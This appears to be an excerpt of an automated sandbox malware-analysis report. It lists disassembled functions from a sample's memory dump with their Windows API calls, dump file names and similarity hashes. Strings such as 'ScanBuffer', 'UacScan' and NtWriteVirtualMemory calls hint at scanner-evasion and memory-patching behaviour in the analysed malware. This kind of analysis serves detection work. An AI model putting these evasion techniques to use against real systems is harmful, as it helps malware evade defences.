                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ff6a51d3a162f61426ab0e0bafe1045cac6ff41408d14562bb1506f1fa94e6fe
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f0a5bf6ad85fe81cdea581803a2b963377c60fe9ba185421d57765fd420809fa
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff6a51d3a162f61426ab0e0bafe1045cac6ff41408d14562bb1506f1fa94e6fe
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7316F71600208ABDB90DFE8CAC4AAE77F9EB0C305F444569FB05D3260DB3AD950CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B089D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B083C2), ref: 02B083A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1478290883-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c5b5c157891e64a36242b07ae15f4a1afc4836c2f0ecceefe39d3a78d68a7cc4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 26654a78b575eac9c07f4ffbdfbb90bc1f791e013551ec0fc5f63f88e46598cc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b5c157891e64a36242b07ae15f4a1afc4836c2f0ecceefe39d3a78d68a7cc4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A62103707C0304AAE791F7E5DD81B5EFBAA9B04B00F5144E0BB14E7190DE78A941AA29
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B06D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02B06DB9,?,?,?,00000000), ref: 02B06D99
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4C60: SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4225568880-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 76abc4b8bd62b249c6afd1131c52a170a880b6e2d7ea56af21308d79517d8873
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ab42e9b89d4db5a33be6034b578cd32f914996fa0438e1477cc71797c529dcf5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76abc4b8bd62b249c6afd1131c52a170a880b6e2d7ea56af21308d79517d8873
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE0E536240308BBE312EBA2DD91D4E7BADDB8A710B5104B1F70093550DE396D108860
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AF5886
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5AE8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B06
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B24
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02AF5B42
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02AF5B8B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF5ACC: RegQueryValueExA.ADVAPI32(?,02AF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001), ref: 02AF5BA9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF5ACC: RegCloseKey.ADVAPI32(?,02AF5BD8,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02AF5BCB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 33d7557dcdea8842403036c12595809bc3e65cc2937dfc3d8bccc43341b13864
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42E03971A003149BCB50DE98C9C4A463398AB08750F440961BE58CF246DBB4D9248BD0
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02AF7DF4
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c868edb7fafd72a1d90ed947cacf22ae032f8bc382fd91a88f63fd2f79e575cb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1D05BB23091507AE224965B9D84EB75BDCCBC6770F10063EF668C7180D7208C05C771
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02B1356F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,Initialize), ref: 02AF7E8B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2810d0adc8a6b7618fd04ee0a9d2a7bec9e6e43608a270e601bbf99aee8f9fb9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C08CF23112010A1EE0A6FC5DC421A42990988134B601E23FB38CA2C1FF2E98222C20
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9900d63119f4fd07fe7fd39963457dcb750c8b01865e0d6086437b51a2e5bc01
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83C08CA03012010A5AE466FC6DC424A528A09082787640A23BB38C62E2FF3E98A32C10
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fd72ff189dce61005dd2bd7bdbe404a2205ea18c8e1f53c6b3b4ea15d62b0935
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC012A264023057EBA157D9ADC075362DC9B09294B1500A1B704D7250EB68D80046A0
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B1C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,02B1C350,00000000,00000001), ref: 02B1C36C
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Eventtime
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fcf5d983510a17dbc035049b8e7897340a5597e470ad8a44672a19c416d5e6ac
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 79ca0b774d55121f8ce7531325c276c7e79fdb216ea85b6254ffb5ca896636a9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcf5d983510a17dbc035049b8e7897340a5597e470ad8a44672a19c416d5e6ac
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91C048B27D03002AFA10A6AA6C82F265A9E9B0AB60F504552B704EA2C2D6A65C104E68
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02AF4C3F
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 18ecd79b801be70ef5b9f4a49d428aded09fda98f961c7ce1ba041740f78ed1c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95B0123524830155FAF823E20F80733004C0B4428AF852062BF18C90E0FF0DC0038835
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02AF4C57
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
